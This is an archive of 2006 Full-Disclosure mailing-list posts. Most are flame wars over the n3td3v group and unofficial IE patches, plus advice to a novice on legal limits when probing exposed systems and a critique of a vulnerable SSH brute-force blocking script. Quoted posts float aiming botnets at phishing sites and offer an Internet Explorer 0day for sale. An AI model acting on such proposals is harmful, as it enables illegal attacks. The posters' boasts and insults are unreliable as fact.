Some ISP's only do server housing and just give the customer full root rights over their Server and stop to care from that point on. I have had a few customers that have been hacked and when i reported it to their ISP's i offten got reply's like It is the responsibility of the Customer to handle such situations [...] We just host the Server [...]. Anothertime i had a infected Windows System from a customer and found some Spyware on it that was hosted on the Rackspace Network. When i reported it to Rackspace after weeks i got an reply saying that i could download the deinstall script from the site aswell Thats all. When i mailed back to ask if they do not care about their reputation i did not get a reply anymore. My opinion is that its all about money. Here and then ISP's probably receive cash from the Spyware Vendors and so allow such Software to be hosted. Of course in public they act like they would want to prevent such activity. -sk GroundZero Security Research and Software Development http://www.groundzero-security.com Wir widersprechen der Nutzung oder Übermittlung unserer Daten für Werbezwecke oder für die Markt- oder Meinungsforschung (§ 28 Abs. 4 BDSG). pub 1024D/69928CB8 2004-09-27 Stefan Klaas [EMAIL PROTECTED] sub 2048g/2A3C7800 2004-09-27 Key fingerprint = A93E 41F8 7E82 5F2C 3E76 41F1 4BCF 3096 6992 8CB8 -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org mQGiBEFX440RBADGTKOgZR9Y9VA/cfNLWTIN/OmXe9l6UZJ6pY8Hqcv6DFE//Kt9 UfQMU470i+I7SvIHZN066Kl4ts4r90sLxXrE4r5VQCLTsJM68cliatrM8MbbZZs+ xf3ldelZrHNvHkXDk4I/n3O56F9M6tZ/S71AIj++raIbFX57fn8Z8NNOnwCgwDr6 LDVP+5N4DML1/+uvXNtoL30D/A/GUXd6lJ8i7MoZMzwKk1uwDsgWwP+Wm0hMwJMr fR/di9K55pGdlGFNO5P2L3qOl2BaC8raNkLcXaweW+bao3P66nzpdtmecsjCMWq2 tQWgu/O7S1FgzlUAKJSOc2Th5PY9Raum8bXnSv4gnHZCKjNskIdrz8WDxCzEoPtZ eCssA/9ydHRvNIPjOTmzjXoE+UbJrB/U//u3dpAsLkzclKeSgjV2eYUgHGcqYn+H cFoubD78yFWqZqYtxfiyjBlItsIn9ls0gAZFKDFHd1XfOLFSa0/NHNpHLxCZGFIA tQ0Gp47VRmTPkWJ7lB505w0XioNs1H/1K1RSp++7+t1SNkBlobQpU3RlZmFuIEts YWFzIDxza0Bncm91bmR6ZXJvLXNlY3VyaXR5LmNvbT6IVwQTEQIAFwUCQVfjjQUL BwoDBAMVAwIDFgIBAheAAAoJEEvPMJZpkoy4AnYAmwTot1PMUty1YoCuMVg6cpr7 HKy1AJ98jyzD365YkIQAEiihXlQJ4zrxBLkCDQRBV+OvEAgAiu75prsTQZdNijtY eMQhl4tEL8qi8JOFluYGnvPYjDzU0PY9E4mNx/w2BgYcM3lTVzSmaiLEJ1AzeOHn w+pLDWsorRZuVI9q3+ExW3s2yFX4ppdHAVBMuYsQyVJRkbobCkcwTbUYXr23pKzh D8WRAJ991k2lNcQHxMgixAN+55XBFLhwLB0Yz7XmhFYLid5dLxdPllLIV3ZHDeY0 SEqMSpw96+gV0QpX7YH9U2VBr3Wz7Ss6qNZkcgHQw1xmk6Yy24QnT4a9oZD06Yjr cCocXnyI/YLW1wXo/6Hh44UH3b9mKUX6eh8ybn7QCnZDG7AdxbglLiPTkdcx0YoT NANZBwADBwf8CrjVKiXSzyhUsdH1es1KQCZ/zH6PvPzdxqYuGuVVMzgaJeeOMS2G 4rLfw2ILahAS0fjng6zX2c1ndPVJ6oAq3IygWsqJH6Uh23NmKTlyx3KtSgyW7YsB Rn/4wobuojArTHTl+X3U4JZTUEb9E4osB9bFjdsgXcxNSwXghQMh1x5eS5/fcjLd tACNq0x2/zh8zTJFHK+oNCLY2+iBjTUn7K03rEhQo6HqbPYwyc3LUCwBuFHFDVWp bZqa4knO0H5BBmbiI09kaVPOs0qRLXCAf1oy9PxK5ZBJ4WfQAnMAU+TuNrTuW2SU NMh92TCELdDpl/pMDbbBGeJdMvXZmY99HIhGBBgRAgAGBQJBV+OvAAoJEEvPMJZp koy4p1QAoIaYw3VxA0/mixUsMO4R13sXIL/pAJ9zodR+A9+bLqCRlVusG8JhItv1 Ow== =E0o1 -END PGP PUBLIC KEY BLOCK- Diese E-Mail kann vertrauliche Informationen enthalten. Wenn Sie nicht der richtige Adressat sind oder diese E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und vernichten Sie diese E-Mail. Das unerlaubte Kopieren sowie die unbefugte Weitergabe dieser E-Mail oder von Teilen dieser E-Mail ist nicht gestattet. This E-mail might contain confidential information. If you are not the right addressee or you have recived this Mail in error, please inform the Sender as soon as possible and delete this E-Mail immediately. You are not allowed to make any copies or relay this E-Mail. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v group calls on RSA to clarify theirstance
So you think the only system that they could possibly have used is wondows based? I doubt they would use windows and even if so,on a Gigabit link and with a clever programmed Software with multithreads this could push out a lot of requests from a single IP. Not that i belive RSA has no subnets andonly a single IP. - Original Message - From: n3td3v To: Morning Wood ; full-disclosure@lists.grok.org.uk Sent: Saturday, April 01, 2006 6:50 AM Subject: Re: [Full-disclosure] n3td3v group calls on RSA to clarify theirstance If the RSA aren't using a bot network, then are you suggesting they are sending garbage data from one single user Microsoft Windows XP computer to all the worlds phishing logins? Wake up mr se cur ity at hotmail dot com On 4/1/06, Morning Wood [EMAIL PROTECTED] wrote: *while RSA are carrying out these attacks, is it legally OK for hackers to"HELP OUT" the RSA by pointing a few of our bot net's at some Yahoo and eBayfake login web pages that we know about and feed them with fake usernameandpassword data. We don't want to end up in jail, but since the RSA are doingit, so we can tell our lawyers that the RSA recommended the tactic to us.* *Much regards,**n3td3v international security group*so... the "n3td3v group" has "a few [of our ] botnets"did I hear thisright? ( *blink* )somehow I dont think RSA is using "botnets", which BTW are ILLEGAL in *most* countries( yes, including your precious UK )I just want to thank the biggest security group ( lol ) for using tehbotz!!!I am sure Yahoo-Inc, Google, EBay, Microsoft and FooBarBlehCo will thankyou publicly on CNN so we will know how n3td3v group saved us all with botnets!!!thanks b0td3v gr0upz,MW___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Alert: Unofficial IE patches appear oninternet
Oh shut up i thought you have unsubscribed from this list ? You claim that your imaginary people work for microsoft, so why dont you simply tell them to act up instead of annoying everyone here on FD. Stop pretending and get lost. Inofficial patches are not evil no matter what you think about them. You have no clue anywaydo you even know what a patch is ? Unofficial patches are just ment as initial help until a proper patch is out, not for mission critical systems. Microsoft needs time to develope a proper patch as they can't simply throw together a patch, but also have to test if it wont break any existing software etc as windows is so windely used on tons ofdifferent platforms andalong with so many Software products, that they have to make sure its all stable. Sure they cant always have perfect results, but if you have to bitch so much about it, why dont you write a proper patch? oh yes iforgot, you can'tcode... Another funny thing you said to someone: "There you go on assuming my knowledge base, even though i've been around the security scene longer than you." Well i remember your old mails where you bragged about having +6 years expirience in the security field. so you came around 1999/2000 ..i started in 1994, so i can lay down the same attitude on you kiddie, isnt it?Besides of that, it doesnt matter if you hang on irc since 20 years, it matters what you did in that time. Others learn and improove, while you just try to look cool with your imaginary group, yet you still expect that someone takes you serious here. - Original Message - From: n3td3v To: full-disclosure@lists.grok.org.uk Sent: Tuesday, March 28, 2006 8:46 PM Subject: Re: [Full-disclosure] Security Alert: Unofficial IE patches appear oninternet On 3/28/06, Matthew Murphy [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE-Hash: RIPEMD160Newsflash, idiot: you're not the first one to think of this.Plenty of people at Microsoft beat you to the punch.When the threat environmentcreated by a vulnerability is as serious as this case and the availablecode-independent workarounds (i.e., other than patches) are so poor, Microsoft will be inclined strongly against holding on to this patch. Matthew firstly starts off his rant by claiming n3td3v is an idiot and then uses some clever words to talk about something thats not entirely clear, but I guess what he is trying to say is hidden inbetween his wording. I'd venture to bet that Microsoft will make this patch available as soonas they're confident in the quality of it.Their first patch day is, at this point, nothing more than a benchmark.They might beat it but theyalmost certainly won't fall short of it unless there are major qualityissues. You would venture to bet? Theres no betting involved. They do only release a patch after Q.A testing. Although they can in certain situations bring forward a patch sooner. Its not about beating a patch day. Microsoft often have patches ready but wait for the corporate known about Tuesday and Thursday press release days that all corporations globally adhere to in the world of security and otherwise. The other thing that you obviously have no clue of is that even arelease on patch Tuesday is "out-of-cycle" as far as Microsoft's test processes are concerned.Microsoft normally issues IE patches on a twomonth cycle -- February, April, June, August, October, December. The other thing I "obviously" have no clue about? There you go on assuming my knowledge base, even though i've been around the security scene longer than you. Sure, Microsoft have a "comfortable" release cycle, although thats just to space everything out in their minds as a corporation. Remember the days before Microsoft started patch tuesday? Yeah, they would release critical patches whenever they see fit. To me the mistake was that they started "Patch Tuesday", so as a corporation, even though its a good thing for normal bug fixes to be issues only once monthly, it makes it harder for Microsoft to release a patch out of cycle for "critical flaws". You seem to think theres not employees at Microsoft who don't want to release patches inbetween patch tuesday. You're wrong, behind the scenes at Microsft right now theres loads of people saying, "we want to release inbetween patch tuesday for critical flaws, but because we've invented patch tuesday for flaws generally, the more we do release patches inbeween patch tuesday, the more it weakness to our patch tuesday policy" "We think patch tuesday is good, but it restricts us to push out patches inbetween that, because we want to keep credibility to our patch release day for all other flaws". So you see, its not that Microsoft don't agree with out of cycle patch releases, its just they
Re: [Full-disclosure] Security Alert: Unofficial IE patches appearoninternet (off topic)
"Imaginary and pretending"... I like that one. Sure you like that, because that is the definition of n3td3v. - Original Message - From: n3td3v To: full-disclosure@lists.grok.org.uk Sent: Wednesday, March 29, 2006 3:29 PM Subject: Re: [Full-disclosure] Security Alert: Unofficial IE patches appearoninternet On 3/29/06, GroundZero Security [EMAIL PROTECTED] wrote: Oh shut up i thought you have unsubscribed from this list ? You claim that your imaginary people work for microsoft, so why dont you simply tell them to act up instead of annoying everyone here on FD. Stop pretending and get lost. Inofficial patches are not evil no matter what you think about them. You have no clue anywaydo you even know what a patch is ? Unofficial patches are just ment as initial help until a proper patch is out, not for mission critical systems. Microsoft needs time to develope a proper patch as they can't simply throw together a patch, but also have to test if it wont break any existing software etc as windows is so windely used on tons ofdifferent platforms andalong with so many Software products, that they have to make sure its all stable. Sure they cant always have perfect results, but if you have to bitch so much about it, why dont you write a proper patch? oh yes iforgot, you can'tcode...' You should hear yourself. You say you've been around since 1994 but you ramble some spit about basic knowledge about "all platforms need to be tested". Yeah, we all know this, like this is FD, we all have expertise in this field. Another funny thing you said to someone: "There you go on assuming my knowledge base, even though i've been around the security scene longer than you." Well i remember your old mails where you bragged about having +6 years expirience in the security field. so you came around 1999/2000 ..i started in 1994, so i can lay down the same attitude To be honest I DON'T care when you started, but you don't come across as someone who has worked in the industry since 1994, far from it. Maybe you should look at your own performance on FD, before you start bashing the n3td3v security group and the founder. on you kiddie, isnt it?Besides of that, it doesnt matter if you hang on irc since 20 years, it matters what you did in that time. IRC? You're having a laugh right... Others learn and improove, while you just try to look cool with your imaginary group, yet you still expect that someone takes you serious here. You seem to think a handful of trolls on FD (you) bashing the n3td3v group is representative of anything credible. - Original Message - From: n3td3v To: full-disclosure@lists.grok.org.uk Sent: Tuesday, March 28, 2006 8:46 PM Subject: Re: [Full-disclosure] Security Alert: Unofficial IE patches appear oninternet On 3/28/06, Matthew Murphy [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE-Hash: RIPEMD160Newsflash, idiot: you're not the first one to think of this.Plenty of people at Microsoft beat you to the punch.When the threat environmentcreated by a vulnerability is as serious as this case and the availablecode-independent workarounds (i.e., other than patches) are so poor, Microsoft will be inclined strongly against holding on to this patch. Matthew firstly starts off his rant by claiming n3td3v is an idiot and then uses some clever words to talk about something thats not entirely clear, but I guess what he is trying to say is hidden inbetween his wording. I'd venture to bet that Microsoft will make this patch available as soonas they're confident in the quality of it.Their first patch day is, at this point, nothing more than a benchmark.They might beat it but theyalmost certainly won't fall short of it unless there are major qualityissues. You would venture to bet? Theres no betting involved. They do only release a patch after Q.A testing. Although they can in certain situations bring forward a patch sooner. Its not about beating a patch day. Microsoft often have patches ready but wait for the corporate known about Tuesday and Thursday press release days that all corporations globally adhere to in the world of security and otherwise. The other thing that you obviously have no clue of is that even arelease on patch Tuesday is "out-of-cycle" as far as Microsoft's test processes are concerned.Microsoft normally issu
Re: [Full-disclosure] Hello everyone
Hello, well the problem is, if you do access the System, you cross the line. Even if its open or without password, but that is already illegal access. Sure you just want to be nice, but if one of the users you try to inform gets angry, then he could still contact law enforcement. On the legal side, he would be right as you accessed his System. Especially if its on a cooperate network. Companies have a lot to loose if customer data or even source code gets stolen, so even if you inform them of a bug, they can't be sure that you didn't already copy things, unless they inform law officials to raid you. In the 90s, if you informed a Administrator of a vulnerability, you offten received a present of some sort like a free t-shirt :-) but those times changed. At least i didnt hear of someone receiving a present for hacking in years (contests don't count). Its a nice idea to inform the people the have vulnerabilities, but you have to be carefull. If you just scan and tell them that port 139 is open then its fine as you didnt access the System and as far as i know port scanning is still legal in most countries, but if you actually connect to a open share thats a different story. A few years back there was also a discussion about whitehat worms which would scan and patch vulnerable hosts, but its still illegal to hack a system and install software, no matter if its to patch or not. Well i suggest you setup a little test network and hack those Systems on your LAN. On that way you can learn without breaking the law. You need to understand how bugs get exploited and how to find vulnerabilities in code and how to write your own exploits. Get some old daemons which are known to be vulnerable and where exploits exist to get a better understanding. Just a few hints, hope that helps you out. good luck! (and dont trust any hacking certifications as that is just to make money) -sk Http://www.groundzero-security.com - Original Message - From: Ian stuart Turnbull [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wednesday, March 29, 2006 5:05 PM Subject: [Full-disclosure] Hello everyone I have just started in this hacking [ethical I should quickly add] and after much reading etc [and a forest more to do] I have a fundamental question I'd like to pose. After just a few hours of scanning (I have to start somewhere} I have located quite a few routers that have their manufacturers password still set not to mention loads of Windows machines that have port 139 open AND have write access to the whole of the C: Drive in some instances. My question - since it is these machines that I understand will be the computers that the hacker will use to hide him/her self and given that there are tools around - just that I don't know of one yet - WHY doesn't someone send a message to these machines that the owner will see and ASK them politely to close up these holes? Perhaps something along the net send command. I'm sure they would love to be enligtened. i.e. their banking info etc won't be stolen. If given the knowledge I'd be happy to devote a day or so doing just this. Currently I don't yet have enough skills. Yes, I know someone somewhere must have asked this question, though I haven't found any instance of it, so please don't flame me. I am here to LEARN from obviously well instructed and knowledgeable people. Also, forgive me if I appear naive - at this point I admit I definately am but that will change in time to come. I'd love to help make the internet a safer place. It is a truly great invention but for a few darksided individuals. Just because one has the knowledge doesn't mean they have to ruin it for others !! _ Are you using the latest version of MSN Messenger? Download MSN Messenger 7.5 today! http://join.msn.com/messenger/overview ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hello everyone
Are these old exploits documented anywhere. I guess maybe not otherwise we'd have a lot more problems. I've googled around but aren't really sure what else to search on other than software exploits but don't seem to be able to find a really good one. Sure there are quiet a lot of such databases out, for example http://www.cve.mitre.org/ or http://www.packetstormsecurity.org/ is a good resource. If you are really serious about learning hacking, then the best resource for information would be phrack.org, but its down so i went to google and found you a mirror: http://phrack.telegenetic.net/ there you find almost any form of bug explained in detail, how they work, how to spot them and of course how to exploit them aswell. A very good idea would be to learn C programming, as around 90% of the exploits are made in C so in order to fully understand them, you need C knowledge. Sure, you could also write exploits in Perl or so, but thats lame and won't work in every case. So if you do it, then right isn't it. Well, this should keep you busy for a while ;-) -sk - Original Message - From: Ian stuart Turnbull [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, March 29, 2006 6:15 PM Subject: Re: [Full-disclosure] Hello everyone Thanks for this helpful informative post. I was expecting to be blasted as an idiot idealist - to be frank, though hoping for just this sort of info. Nice one. I guess as in most things in life - mind your own business and if you don't you're liable to get punched in the nose. I think I liked it better when the free T-Shirts were in vogue. Sticking to my own LAN is a great idea though admittedly I expect there are times when being inside won't work the same as if coming from the ether. Not that I'd want to cross the line and test what you say I just read a great article where a 13 year old bombed GRC.COM a few years back but due to his age and that he hadn't commited more than $US 5,000 of damage the FBI said they really didn't have the resources to bother with him. http://grc.com/dos/grcdos.htm Are these old exploits documented anywhere. I guess maybe not otherwise we'd have a lot more problems. I've googled around but aren't really sure what else to search on other than software exploits but don't seem to be able to find a really good one. Again, thanks for your helpful email Groundzero. Ian t From: GroundZero Security [EMAIL PROTECTED] To: Ian stuart Turnbull [EMAIL PROTECTED] CC: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Hello everyone Date: Wed, 29 Mar 2006 17:43:23 +0200 MIME-Version: 1.0 Received: from hosting.GroundZero-Security.com ([217.172.172.12]) by bay0-pamc1-f10.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.1830); Wed, 29 Mar 2006 07:41:54 -0800 Received: from nuclearwinter (p5499E7FC.dip.t-dialin.net [84.153.231.252])by hosting.GroundZero-Security.com (8.13.1/8.13.1/SuSE Linux 0.7) with SMTP id k2TFgLw0020333;Wed, 29 Mar 2006 17:42:24 +0200 X-Message-Info: JGTYoYF78jEHjJx36Oi8+Z3TmmkSEdPtfpLB7P/ybN8= References: [EMAIL PROTECTED] X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1506 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506 Return-Path: [EMAIL PROTECTED] X-OriginalArrivalTime: 29 Mar 2006 15:41:54.0612 (UTC) FILETIME=[4E2EEF40:01C65347] Hello, well the problem is, if you do access the System, you cross the line. Even if its open or without password, but that is already illegal access. Sure you just want to be nice, but if one of the users you try to inform gets angry, then he could still contact law enforcement. On the legal side, he would be right as you accessed his System. Especially if its on a cooperate network. Companies have a lot to loose if customer data or even source code gets stolen, so even if you inform them of a bug, they can't be sure that you didn't already copy things, unless they inform law officials to raid you. In the 90s, if you informed a Administrator of a vulnerability, you offten received a present of some sort like a free t-shirt :-) but those times changed. At least i didnt hear of someone receiving a present for hacking in years (contests don't count). Its a nice idea to inform the people the have vulnerabilities, but you have to be carefull. If you just scan and tell them that port 139 is open then its fine as you didnt access the System and as far as i know port scanning is still legal in most countries, but if you actually connect to a open share thats a different story. A few years back there was also a discussion about whitehat worms which would scan and patch vulnerable hosts, but its still illegal to hack a system and install software, no matter if its to patch or not. Well i suggest you setup a little test network and hack those Systems on your LAN. On that way you can learn without breaking
Re: [Full-disclosure] Industry calls on Microsoft to scrapPatchTuesday for Critical flaws
first you say: "One reason being the folks within the n3td3v group are actually people from MS, YAHOO, AOL, etc already" or: "the n3td3v group is the biggest thing you'll ever meet in your life time" then later: "..as the big players get it so badly wrong infront of the international stage" isnt that conflicting ? first you pretend that you (and your imaginary group) would be the biggest shit out there, but then you refer to SANS as the big players while you first braged that your imaginary people work for MS etc. try to keep your story straight - Original Message - From: n3td3v To: full-disclosure@lists.grok.org.uk Sent: Sunday, March 26, 2006 5:46 AM Subject: Re: [Full-disclosure] Industry calls on Microsoft to scrapPatchTuesday for Critical flaws Wow, hence the ideals of being an anonymous group. Like if names were put to list, they wouldn't be sacked straight away... Wake up, smell the postitives of being anonymous for five minutes, or maybe that leaves you, CERT, SANS a bit head rubbed, just like SANS once said FIREFOX posed a lesser threat that IE. OH, the guys I speak to at MS were chuckling about that one. Of course SANS reversed their claim that FIREFOX was less vulnerable than IE later, much later. The credibility of SANS, of course comes into questions, while folks at n3td3v c onsortium laugh with glee, as the big players get it so badly wrong infront of the international stage. On 3/26/06, William Lefkovics [EMAIL PROTECTED] wrote: Not to mention the absence of legitimate names of the folks.-Original Message-From: [EMAIL PROTECTED][mailto:[EMAIL PROTECTED]] On Behalf Of Mike HoyeSent: Saturday, March 25, 2006 7:08 PM To: full-disclosure@lists.grok.org.ukSubject: Re: [Full-disclosure] Industry calls on Microsoft to scrapPatchTuesday for Critical flawsOn Sun, Mar 26, 2006 at 03:39:32AM +0100, n3td3v wrote: One reason being the folks within the n3td3v group are actually people from MS, YAHOO, AOL, etc already.You know, legitimate groups don't have to keep claiming, over and over, thatthey're legit. It's remarkable how that works.--"Totally mad. Utter nonsense. But we'll do it because it's brilliantnonsense." - Douglas Adams__ Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: SURROUNDED
WE'RE NEVER RELEASED ACTUAL EXPLOIT CODE OR VULN INFO UNDER THE N3TD3V NAME, BUT THERES ALREADY THE N3TD3V THIGN WORLD WIDE ON FD AND AROUND THE WORLD, SO WHOS GOT MORE POLTICAL PULL? YOU OR ME? lol too damn funny. someone is getting pissed, so he has to write in caps SO YOU ALL CAN FEEL THE R4G3 !!! The whole security industry is laughing about the n3td3v trolling thats the only thing that is going on. n3td3v never provided any usefull information, only bragged on how big he is (or his imaginary group of d0t c0m s3cur1ty pr0f3s510n4lz !!). Yet he thinks he can make us belive he would be one of the biggest players around. well the thing is just noone ever saw any usefull info of n3td3v, nor any speeches on confs or whatever. Also noone will buy his lies on how he does security for the biggest companies out there as those people can hire actual security pro's that can afford a real domain and not hide behind a l33tsp34k nickname.. - Original Message - From: php0t [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, March 20, 2006 7:24 AM Subject: RE: [Full-disclosure] Fwd: SURROUNDED Jesus tap dancing christ, this can't be even half serious. OR MAYBE YOU GUYS JUST DON'T GET HOW BIG I'VE BEEN GROWING THE N3TD3V GROUP SINCE EIGHT YEARS BEFORE I STARTED EH? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: SURROUNDED
Yesyou might be bigger than me (i'm just 1,78m), but i am better than you ;-) - Original Message - From: n3td3v To: GroundZero Security ; full-disclosure@lists.grok.org.uk Sent: Monday, March 20, 2006 3:27 PM Subject: Re: [Full-disclosure] Fwd: SURROUNDED I'm bigger than you, thats for sure. Your dumb ass http://g-0.org sucks. "We take care of your security". Sure you do, kiddie. If anyone is funny its j00. On 3/20/06, GroundZero Security [EMAIL PROTECTED] wrote:lol too damn funny. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Advisory] ~ [Thu Mar 16 14:26:43 EST 2006] ~ Local Privilege Escalation Vulnerability in Apple MacOSX
[Advisory] ~ [Thu Mar 16 14:26:43 EST 2006] ~ Local Privilege Escalation Vulnerability in Apple MacOSX -- I. Workaround -- This vulnerability has no workarounds for the vulnerability. -- II. Vendor Response -- Apple MacOSX has extended no commentary on this vulnerability indentified. -- Contact -- GroundZero Security [EMAIL PROTECTED] GSAE CEH GREM SSP-CNSA SSP-MPA GIPS GWAS ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet Explorer 0day
i offer you a handfull magic beans ! - Original Message - From: Expanders [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wednesday, March 15, 2006 2:23 AM Subject: Re: [Full-disclosure] Internet Explorer 0day Do you know what Full Disclosure mean? Go posting your shit anywhere else. Regards Expanders just0days wrote: I sell an Internet Explorer 0day. Command execution - Internet zone. Are you interested? Make an offer. Bye ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] For Sale: Security Vulnerability DatabaseCompany
Noone takes a google group serious get a real domain. the n3td3v thing is just a site thrown together so they can put up adsense and make some cash. It looks totally unprofessional, yet they claim its build from "software developers, international hackers, security researchers, online media journalists, system administrators, incident response professionals, top thinkers and security aware peoples" and not even oneof them has skills in html or even 10 bucks to buy a domain? yeah right. :-) - Original Message - From: System Outage To: full-disclosure@lists.grok.org.uk Sent: Thursday, March 09, 2006 10:14 PM Subject: Re: [Full-disclosure] For Sale: Security Vulnerability DatabaseCompany Thats a complete exaduration actually, theres no query on the group that would come up with 5,000 results. The n3td3v group engine is pretty accurate, and displays perfect technical detail documentation, and additionally, (if required)can offer related and even off shoot background discussion intoa particular vulnerability at the time of its disclosure. To say an ntp search would come up with 5,000 unrelated results is completely barbaric. I think the source to your hatred is with the founder ('n3td3v') rather than the group its self which offers a great resource to anyone in the security field. Of course, if you can provide conclusive evidence to the contrary, do get in touch with the list, providing indepth audit information relating to your claim.[EMAIL PROTECTED] wrote: On Wed, 08 Mar 2006 05:46:03 PST, System Outage said: Why would someone buy a security vulnerability database company? Theres already free security vulnerability databases out there. Try this one I recently found, you can search for anything you want http://groups.google.com/ group/n3td3v and its free.Geez. Somebody hand me a sharp wooden stake, a good mallet, and some garlicand holy water just in case... ;)I'm sure you can *search* for anything you want there. The value of a databaseis, however, directly related to its ability to return useful information.5,000 postings that all say "wow leet hole in ntp a few years ago" is worthnowhere near as much as one detailed technical posting of how that exploitleveraged a one-byte buffer overrun into a complete rooting of the box Brings words and photos together (easily) withPhotoMail - it's free and works with Yahoo! Mail. ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: reduction of brute force login attemptsviaSSHthrough iptables --hashlimit
your pathetic .. - Original Message - From: Dave Korn [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Friday, March 03, 2006 4:59 PM Subject: [Full-disclosure] Re: reduction of brute force login attemptsviaSSHthrough iptables --hashlimit GroundZero Security wrote: Oh well...as i said its a QUICK script and not a PERFECT solution to the problem. The fact that you threw together this booby-trap in a few minutes does not get you off the hook for the fact that it is a booby trap that you were offering to other people. Given that the script is a deadly threat to anyone's security who runs it, offering it around to them just is NOT being helpful or better than nothing. Remember, anyone who doesn't run this script has no problem worse than annoying noise in their log files. Your script solves the problem of annoying noise in the logs at the expense of opening a massive remote execution vulnerability. That is NOT a worthwhile tradeoff EVER. I made it for personal use originally and it does its job..sofar i NEVER had problems with it and usually an attacker wont know you run it (i know thats not an execuse). HEY EVERYONE! SK IS RUNNING A VULNERABLE SCRIPT ON HIS BOX! LAST ONE TO PWN HIM IS A SUXXOR! cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] reduction of brute force login attempts via SSHthrough iptables --hashlimit
Oh well...as i said its a QUICK script and not a PERFECT solution to the problem. I made it for personal use originally and it does its job..sofar i NEVER had problems with it and usually an attacker wont know you run it (i know thats not an execuse). Anyhow its no problem at all to modify, so if you dont like it, just dont use it. Please note that this entire script can ALL be done in 1, count them 1, awk command. (sed as well, but not worth it). ok so show me that 1 awk command that replaces the entire script... If you are going to ATTEMPT to do something, at least use documented options. It's ``grep -A1'' not ``grep -1''. Then a pipe into sed THEN into awk? After all it works. There are always more ways to do it, but if its -A1 or -1 really doesnt matter at all, its just you have to be pedantic over it i guess. Yep im not a bash guru maybe,but i really dont care much for optimization on a lame script like this as long as it WORKS and is not insecure. Which brings me to another point. Your use of static temp files in the current working directory is just... my god. Well this script is not ment to be run from a directory that normal users can access. I know that temporary files can be dangferous but not in a case where a normal user cant access the temp files i.e. if you run it from /root/bruteblock/ or so. Ohh, we are almost done! I liked symlinking m to /dev/urandom. It made me feel good about myself. Looks like you have too much time on your hands. Do something productive instead. That just makes no sense, yet again. Here is where you would use -1, but with ls(documented and valid switch unlike in grep). I used a different approach that works out. You can do it that way, i do it this way. :( Your not blocking lIP did not matter, like it would anyways. You made me sad. Notice your pattern match just LOVED accepting 0.0.0.0/0. Well this script asumes that your local users dont do stupid things. If you manage to get the script to block 0.0.0.0/0 remotely then let me know. Thats something i would change, but for now i dont feel like wasting time over this script. It was a simple and quick solution and does its job unless you cant trust your local users. In that case you should put it in a directory that only root can access like it is ment to be. Anyhow as i said i originally made it for personal use and i dont give my users shell access. Anyhow just thought someone else may have a use for it whos annoyed by those ssh bruteforce attempts. Its nice of you to point out problems though. Sure you could optimize it, but that would only speed up the script which isnt needed in my opinion unless you run Linux on your c64 then i would worry about resource consumption. If you really think it sucks sooo much that you cant take it, then before you reply to this mail now, go and optimize it and send your version to FD then you can be happy and feel superior :-) -sk - Original Message - From: nocfed 